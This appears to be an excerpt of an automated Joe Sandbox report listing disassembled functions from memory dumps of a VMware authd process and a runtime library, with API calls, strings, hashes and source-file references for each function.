                                                    • Opcode Fuzzy Hash: 2df9209defe952386f5c4df85d6338dd650f035222d51fc15e14429a4ea509f9
                                                    • Instruction Fuzzy Hash: 2F51D532A02604EFDB11EF69DC41BAABBF4EF45728F14076AE905DBA90E731D901CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED4480 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleclosesocket$free
                                                    • String ID:
                                                    • API String ID: 920023663-0
                                                    • Opcode ID: e6f9d85b25d7d98eba67bf99854758e63543b31e0d6e676997e6d10c8122535c
                                                    • Instruction ID: 943821db612db09328170e317dcd1c0c49a536fbb1e6b39f5523efb096719529
                                                    • Opcode Fuzzy Hash: e6f9d85b25d7d98eba67bf99854758e63543b31e0d6e676997e6d10c8122535c
                                                    • Instruction Fuzzy Hash: CDF0C2B55015106B86209F3AFC48A1AB3A8EF563397085237F879F32D0D730E99786E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED27C0 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                    • Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                    • Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                    • _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED26C0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,00ED2829,00EDA850,?,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED26C9
                                                      • Part of subcall function 00ED26C0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00EDA850,00000000,?,?,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED26E4
                                                    • SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastWarning$__acrt_iob_func__stdio_common_vfprintf_printf
                                                    • String ID:
                                                    • API String ID: 3351516144-0
                                                    • Opcode ID: 3a1e13a3a2040303111bd8051b89909bb573fa2bd5aaf1bcc950c488738777f6
                                                    • Instruction ID: afb1d4bedeb8b6925bc287694e3859231e1bdea95541ccdb16816248a01399fc
                                                    • Opcode Fuzzy Hash: 3a1e13a3a2040303111bd8051b89909bb573fa2bd5aaf1bcc950c488738777f6
                                                    • Instruction Fuzzy Hash: 02F0D67550124CAFDB11AF50DD46AEE33ECDF08305F4400A7FE04F6211DA709B869BA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF77DD8 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(6CFDB368,00000000,?,6CF62074,6CFD9F48,6CF9E680,00000001), ref: 6CF77DE2
                                                    • LeaveCriticalSection.KERNEL32(6CFDB368,?,6CF62074,6CFD9F48,6CF9E680,00000001), ref: 6CF77E15
                                                    • RtlWakeAllConditionVariable.NTDLL ref: 6CF77E8C
                                                    • SetEvent.KERNEL32(?,6CFD9F48,6CF9E680,00000001), ref: 6CF77E96
                                                    • ResetEvent.KERNEL32(?,6CFD9F48,6CF9E680,00000001), ref: 6CF77EA2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                    • String ID:
                                                    • API String ID: 3916383385-0
                                                    • Opcode ID: 5d3b0cb314b42ad87b1324993bd972d291f0c0700554adc495d238b29a9d2d6a
                                                    • Instruction ID: 84d15d51241c07612a126cd462db01c8de24828b8578c4c198760a358da5d576
                                                    • Opcode Fuzzy Hash: 5d3b0cb314b42ad87b1324993bd972d291f0c0700554adc495d238b29a9d2d6a
                                                    • Instruction Fuzzy Hash: 2001F635F21620DBDF859F28E849B997BB9EB0B711712445BF90687620CB316C00DF94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF9390B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID: *?
                                                    • API String ID: 269201875-2564092906
                                                    • Opcode ID: 73d4f841bc70df50bfa6d55bf2e377d3ea8cedae22026cd6f06c591226949cf6
                                                    • Instruction ID: 4f2471d59aa73df7f487155dcb923ee6c47cf0ac5ea93b7d3ff7c3d897c9f579
                                                    • Opcode Fuzzy Hash: 73d4f841bc70df50bfa6d55bf2e377d3ea8cedae22026cd6f06c591226949cf6
                                                    • Instruction Fuzzy Hash: 64615F76D002199FEF14CFA9C8805DEFBF5EF49314B25816AD819E7740D731AE458B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED3B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                      • Part of subcall function 00ED39A0: Warning.VMWAREBASE(?,00000406,?,?,?), ref: 00ED39D9
                                                      • Part of subcall function 00ED39A0: Warning.VMWAREBASE(00000000,?,?,?,?,?,?), ref: 00ED3A21
                                                      • Part of subcall function 00ED39A0: WSAGetLastError.WS2_32(?,?,?,?,?,?), ref: 00ED3A2B
                                                      • Part of subcall function 00ED39A0: WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?), ref: 00ED3A49
                                                      • Part of subcall function 00ED39A0: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED3AD1
                                                      • Part of subcall function 00ED39A0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED3AEE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$CloseErrorHandleLastObjectSingleWait
                                                    • String ID: %s$%3d %s$%3d-%s
                                                    • API String ID: 3663929458-2392319129
                                                    • Opcode ID: 753682546031ff4e49b6c1a649db4dd11e49e5fe5652e1ffe5f83e55969b7a03
                                                    • Instruction ID: b09ac5cb0f2b58e37f12327d224965fee439f2bf1de086f97e0eb814e90acd7f
                                                    • Opcode Fuzzy Hash: 753682546031ff4e49b6c1a649db4dd11e49e5fe5652e1ffe5f83e55969b7a03
                                                    • Instruction Fuzzy Hash: 95116A75500208DFDB10DF64CD51FA973A8EB44304F4051AAFB09AB382EB755A56CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED81C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 00ED81DE
                                                      • Part of subcall function 00ED8250: Warning.VMWAREBASE(00000001,?,00000000,?,00ED81F3,00000000,00000000), ref: 00ED825E
                                                    • Warning.VMWAREBASE([Ticket] Failed to get ticket dir in reap.,?,?,?,?,00000000), ref: 00ED822E
                                                      • Part of subcall function 00ED7CD0: Warning.VMWAREBASE(00ED8208,?,?,00000000,00000000,00ED8208,?,00000000), ref: 00ED7CFA
                                                      • Part of subcall function 00ED7CD0: Warning.VMWAREBASE([Ticket] Unable to open dir %s,00ED8208,00000000,00000000,00ED8208,?,00000000), ref: 00ED7D0F
                                                      • Part of subcall function 00ED7CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00ED8208,?,00000000), ref: 00ED7E34
                                                      • Part of subcall function 00ED7CD0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED7E53
                                                      • Part of subcall function 00ED7CD0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED7E85
                                                      • Part of subcall function 00ED7CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00ED7E8E
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,00000000,?,?,?,?,00000000), ref: 00ED820D
                                                    Strings
                                                    • [Ticket] Failed to get ticket dir in reap., xrefs: 00ED8229
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free$_errno$_time64
                                                    • String ID: [Ticket] Failed to get ticket dir in reap.
                                                    • API String ID: 2503824821-659992124
                                                    • Opcode ID: 0f430352cf8f9aae470da581c505df160bc67945574924f0c2f087203173a81d
                                                    • Instruction ID: 92dda0aed25545cf3d9d7475ec397c8584e4a29f25266d8ae9e8c15f5d629564
                                                    • Opcode Fuzzy Hash: 0f430352cf8f9aae470da581c505df160bc67945574924f0c2f087203173a81d
                                                    • Instruction Fuzzy Hash: 4C01B535A411086FCB10ABA9ED06BEEBBA8DB45315F0410B7F909A7341DE314A19D6A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED87F4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __current_exception.VCRUNTIME140 ref: 00ED8834
                                                    • __current_exception_context.VCRUNTIME140 ref: 00ED8844
                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED884B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: __current_exception__current_exception_contextterminate
                                                    • String ID: csm
                                                    • API String ID: 2542180945-1018135373
                                                    • Opcode ID: 79568928cb84ca8f18875abe0169c2d903c32db075f0e9679078ea4216b1f40a
                                                    • Instruction ID: 9a0922446f81a8f6d77eb9c1daceaf2dc4d1bfd9b78baf588ab8ffc84b01c364
                                                    • Opcode Fuzzy Hash: 79568928cb84ca8f18875abe0169c2d903c32db075f0e9679078ea4216b1f40a
                                                    • Instruction Fuzzy Hash: 61112A35A001198FCF48DF58D9809ADB7F2FF48304B589156E408AF352E734EC82DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED90F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __current_exception.VCRUNTIME140 ref: 00ED912F
                                                    • __current_exception_context.VCRUNTIME140 ref: 00ED9139
                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED9140
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: __current_exception__current_exception_contextterminate
                                                    • String ID: csm
                                                    • API String ID: 2542180945-1018135373
                                                    • Opcode ID: 3d1d2967018fffc7dd7f5239612227f13c30211aea480afc6b1b89040ee7cc8f
                                                    • Instruction ID: 6b114952d4ad2d1afaf78eb8a3f1fcdcb96b3ff0311acd4167fe660c08c30444
                                                    • Opcode Fuzzy Hash: 3d1d2967018fffc7dd7f5239612227f13c30211aea480afc6b1b89040ee7cc8f
                                                    • Instruction Fuzzy Hash: 1FF082355012069F8F307E299D0A01EB7ECEE11325B562417D448AB712CB20AD53C6D1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF82DEC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CF82D9D,00000000,?,00000001,?,?,?,6CF82E8C,00000001,FlsFree,6CFA5C60,6CFA5C68), ref: 6CF82DF9
                                                    • GetLastError.KERNEL32(?,6CF82D9D,00000000,?,00000001,?,?,?,6CF82E8C,00000001,FlsFree,6CFA5C60,6CFA5C68,00000000,?,6CF7B5AC), ref: 6CF82E03
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CF82E2B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID: api-ms-
                                                    • API String ID: 3177248105-2084034818
                                                    • Opcode ID: fd909e06c560841b73e480d64ca754c68bbcc7f931bff29b61d83c604d2d7c80
                                                    • Instruction ID: 07395595e6f9f9e2c666e06574478cebacb448a6d7db4c5709df6cc73b097da7
                                                    • Opcode Fuzzy Hash: fd909e06c560841b73e480d64ca754c68bbcc7f931bff29b61d83c604d2d7c80
                                                    • Instruction Fuzzy Hash: C9E04F30786208B7EF801F61DC4DF893F799F11B5AF240421FA0CA88D0E7A2E5A199D8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED31F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(000F01FF,?,?,00ED15CF), ref: 00ED3209
                                                    • OpenProcessToken.ADVAPI32(00000000,?,00ED15CF), ref: 00ED3210
                                                    Strings
                                                    • bora\apps\vmauthd\authdWin32.c, xrefs: 00ED3230
                                                    • NOT_IMPLEMENTED %s:%d, xrefs: 00ED3235
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentOpenToken
                                                    • String ID: NOT_IMPLEMENTED %s:%d$bora\apps\vmauthd\authdWin32.c
                                                    • API String ID: 2256020841-3151342028
                                                    • Opcode ID: 4be7737fec3a1ec53577cb7b3e378468c024a69b1543098a64c32bc45776a2bd
                                                    • Instruction ID: 09f22f0291e3731b03ac814a51b83d87c40db0c442ef945124886819a845b0a9
                                                    • Opcode Fuzzy Hash: 4be7737fec3a1ec53577cb7b3e378468c024a69b1543098a64c32bc45776a2bd
                                                    • Instruction Fuzzy Hash: 40E09B3474020CAFC710EFB5AD4699D77F8EF04701F44106BFA01B6390DE709A058762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED2780 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,000000FF,00000000,00000000,?,00ED38C9,Data not in UTF-8 format,?,00000003,Line is not in UTF-8. Disconnecting,?,00000000,00ED13A6), ref: 00ED278B
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000005,Data dump: %s,00000000,00000005,%s,00000003,?,000000FF,00000000,00000000,?,00ED38C9,Data not in UTF-8 format,?,00000003), ref: 00ED27AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$_printffree
                                                    • String ID: %s$Data dump: %s
                                                    • API String ID: 457744589-4163292847
                                                    • Opcode ID: fc1472320303602c229c4ac6545966905098bb015c0d697fe864c22e1577daa4
                                                    • Instruction ID: fd68bb06306c2f92d5db672aeea9c21c278cffefad49d48061d2132ecae18507
                                                    • Opcode Fuzzy Hash: fc1472320303602c229c4ac6545966905098bb015c0d697fe864c22e1577daa4
                                                    • Instruction Fuzzy Hash: 7CD05B3018232876E62037659C47F8B3E5CCF02B71F115217FF2C753D29A522A1255E9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF7EE87 Relevance: 6.2, APIs: 4, Instructions: 192COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog3.LIBCMT ref: 6CF7EE8E
                                                    • UnDecorator::getSymbolName.LIBCMT ref: 6CF7EF20
                                                    • DName::operator+.LIBCMT ref: 6CF7F024
                                                    • DName::DName.LIBVCRUNTIME ref: 6CF7F0C7
                                                      • Part of subcall function 6CF7CA50: shared_ptr.LIBCMT ref: 6CF7CA6C
                                                      • Part of subcall function 6CF7CC4C: DName::DName.LIBVCRUNTIME ref: 6CF7CCAA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
                                                    • String ID:
                                                    • API String ID: 1134295639-0
                                                    • Opcode ID: 66deb29f19451824d4406ad4ea8ec46c7b3852929f978e30ea830bc54a119eac
                                                    • Instruction ID: abd6dca165e71881182019d4cd7919cd52523201a367f785e65522d8848bec0b
                                                    • Opcode Fuzzy Hash: 66deb29f19451824d4406ad4ea8ec46c7b3852929f978e30ea830bc54a119eac
                                                    • Instruction Fuzzy Hash: 83714972D162098FDF50CFA4E484BEEBBB4BB09318F14456BE520ABB51D734A945CBB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF7B5B7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1740715915-0
                                                    • Opcode ID: def72a0cd1b808d4bffb5606597266646a020fa5456266c5ec5402a7e7bd77ae
                                                    • Instruction ID: b611ded46176536d63fc67bc7d8aa7ff474281ab91d13f42f602558eac5a729c
                                                    • Opcode Fuzzy Hash: def72a0cd1b808d4bffb5606597266646a020fa5456266c5ec5402a7e7bd77ae
                                                    • Instruction Fuzzy Hash: AC51C172506606AFEB258F54F840BAA73B4FF02308F20496FEA1557A90E731E841CBB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF798A2 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
